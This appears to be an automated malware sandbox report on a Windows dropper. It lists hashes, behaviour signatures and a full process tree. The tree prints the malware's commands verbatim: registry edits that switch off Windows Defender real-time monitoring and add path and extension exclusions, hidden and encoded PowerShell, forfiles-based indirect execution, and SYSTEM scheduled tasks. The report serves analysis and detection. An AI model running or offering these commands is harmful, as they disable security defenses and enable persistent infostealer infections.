Analysis

  • max time kernel
    210s
  • max time network
    211s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    02/09/2024, 05:02

General

  • Target

    30dc51bc0eb17c3cc5245fc96d08e282cacb4dcc3f710da24ecf94c3cc354f5b.exe

  • Size

    7.3MB

  • MD5

    298d76769c9380c435fd4e43ac256e55

  • SHA1

    de6cf97ee3965547a6da51251566c1d0c779458c

  • SHA256

    30dc51bc0eb17c3cc5245fc96d08e282cacb4dcc3f710da24ecf94c3cc354f5b

  • SHA512

    495a657c130adeaf5e8735135e372a2994cb85a09bff737849eafb19659ee664a4f7a8d5a0aadee0160a43d71d0e4ac5ed13b0e90dd44419f1aab86c4737ebcc

  • SSDEEP

    196608:91OEG2tNPptkHIqn9Akti+Ffk0AwVRvbCeUKjBbY86L:3OgP3kHZ9AcFFDLRuMxQ

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\30dc51bc0eb17c3cc5245fc96d08e282cacb4dcc3f710da24ecf94c3cc354f5b.exe
    "C:\Users\Admin\AppData\Local\Temp\30dc51bc0eb17c3cc5245fc96d08e282cacb4dcc3f710da24ecf94c3cc354f5b.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2152
    • C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2676
      • C:\Users\Admin\AppData\Local\Temp\7zS253C.tmp\Install.exe
        .\Install.exe /GKndidLyIt "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2820
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2840
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2844
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2560
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1960
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2764
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2708
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                7⤵
                  PID:2592
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • System Location Discovery: System Language Discovery
              PID:2536
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                6⤵
                • System Location Discovery: System Language Discovery
                PID:2548
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2556
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              PID:2568
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                6⤵
                  PID:2604
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    7⤵
                      PID:2616
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  5⤵
                  • Indirect Command Execution
                  • System Location Discovery: System Language Discovery
                  PID:2660
                  • C:\Windows\SysWOW64\cmd.exe
                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                    6⤵
                    • System Location Discovery: System Language Discovery
                    PID:3040
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                      7⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Drops file in System32 directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3036
                      • C:\Windows\SysWOW64\gpupdate.exe
                        "C:\Windows\system32\gpupdate.exe" /force
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:2640
              • C:\Windows\SysWOW64\forfiles.exe
                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                4⤵
                • Indirect Command Execution
                PID:2852
                • C:\Windows\SysWOW64\cmd.exe
                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:596
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Drops file in System32 directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1348
                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2848
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "bGRMUcRlXIkCKIeoVz" /SC once /ST 05:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\oajLYgZUBEiHBIoDA\LlPuXljjTWxhjwK\qaPUYhD.exe\" u3 /pTydidAtj 525403 /S" /V1 /F
                4⤵
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:664
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 580
                4⤵
                • Loads dropped DLL
                • Program crash
                PID:2736
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {6ECEE1DF-6B75-424C-8CEA-F83EA33A4536} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
            PID:800
            • C:\Users\Admin\AppData\Local\Temp\oajLYgZUBEiHBIoDA\LlPuXljjTWxhjwK\qaPUYhD.exe
              C:\Users\Admin\AppData\Local\Temp\oajLYgZUBEiHBIoDA\LlPuXljjTWxhjwK\qaPUYhD.exe u3 /pTydidAtj 525403 /S
              2⤵
              • Executes dropped EXE
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              PID:600
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                3⤵
                • System Location Discovery: System Language Discovery
                PID:2388
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                  4⤵
                  • Indirect Command Execution
                  • System Location Discovery: System Language Discovery
                  PID:1808
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                    5⤵
                      PID:1088
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                        6⤵
                          PID:2148
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                      4⤵
                      • Indirect Command Execution
                      • System Location Discovery: System Language Discovery
                      PID:2492
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                        5⤵
                          PID:2120
                          • \??\c:\windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                            6⤵
                            • System Location Discovery: System Language Discovery
                            PID:2292
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                        4⤵
                        • Indirect Command Execution
                        PID:2348
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:1988
                          • \??\c:\windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                            6⤵
                              PID:2000
                        • C:\Windows\SysWOW64\forfiles.exe
                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                          4⤵
                          • Indirect Command Execution
                          PID:1664
                          • C:\Windows\SysWOW64\cmd.exe
                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                            5⤵
                              PID:2260
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                6⤵
                                • System Location Discovery: System Language Discovery
                                PID:2500
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                            4⤵
                            • Indirect Command Execution
                            • System Location Discovery: System Language Discovery
                            PID:2484
                            • C:\Windows\SysWOW64\cmd.exe
                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                              5⤵
                                PID:2132
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                  6⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1316
                                  • C:\Windows\SysWOW64\gpupdate.exe
                                    "C:\Windows\system32\gpupdate.exe" /force
                                    7⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:964
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /CREATE /TN "gvHPYxkoz" /SC once /ST 01:15:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                            3⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:2016
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /run /I /tn "gvHPYxkoz"
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:2600
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /DELETE /F /TN "gvHPYxkoz"
                            3⤵
                              PID:820
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2264
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                4⤵
                                • Modifies Windows Defender Real-time Protection settings
                                • System Location Discovery: System Language Discovery
                                PID:1668
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2096
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                4⤵
                                • Modifies Windows Defender Real-time Protection settings
                                PID:2648
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /CREATE /TN "gQEzLukAX" /SC once /ST 04:12:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                              3⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:2740
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /run /I /tn "gQEzLukAX"
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2576
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /DELETE /F /TN "gQEzLukAX"
                              3⤵
                                PID:2704
                              • C:\Windows\SysWOW64\forfiles.exe
                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                3⤵
                                • Indirect Command Execution
                                PID:2884
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                  4⤵
                                    PID:2908
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                      5⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Drops file in System32 directory
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2932
                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                        6⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:484
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GyCSmFAiAvfejamA" /t REG_DWORD /d 0 /reg:32
                                  3⤵
                                    PID:2028
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GyCSmFAiAvfejamA" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • Windows security bypass
                                      • System Location Discovery: System Language Discovery
                                      PID:688
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GyCSmFAiAvfejamA" /t REG_DWORD /d 0 /reg:64
                                    3⤵
                                      PID:1868
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GyCSmFAiAvfejamA" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1924
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GyCSmFAiAvfejamA" /t REG_DWORD /d 0 /reg:32
                                      3⤵
                                        PID:1028
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GyCSmFAiAvfejamA" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                            PID:2452
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GyCSmFAiAvfejamA" /t REG_DWORD /d 0 /reg:64
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1836
                                          • C:\Windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\GyCSmFAiAvfejamA" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                              PID:2104
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C copy nul "C:\Windows\Temp\GyCSmFAiAvfejamA\HmNipWOM\zYykGqavHzomYZaM.wsf"
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2760
                                          • C:\Windows\SysWOW64\wscript.exe
                                            wscript "C:\Windows\Temp\GyCSmFAiAvfejamA\HmNipWOM\zYykGqavHzomYZaM.wsf"
                                            3⤵
                                            • Modifies data under HKEY_USERS
                                            PID:1640
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiVavEUuWbUn" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:1088
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiVavEUuWbUn" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:2120
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdWOdyGKahRU2" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:2460
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdWOdyGKahRU2" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:1356
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VVvqcCGcXqatFTEanDR" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:2160
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VVvqcCGcXqatFTEanDR" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:1316
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qdCKAPMjU" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:2388
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qdCKAPMjU" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:828
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ryCjKLcUASjeC" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:960
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ryCjKLcUASjeC" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:2016
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\zbVZwezRqQdbQsVB" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1852
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\zbVZwezRqQdbQsVB" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:2968
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:2376
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:1608
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\oajLYgZUBEiHBIoDA" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:3004
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\oajLYgZUBEiHBIoDA" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:1840
                                            • C:\Windows\SysWOW64\reg.exe
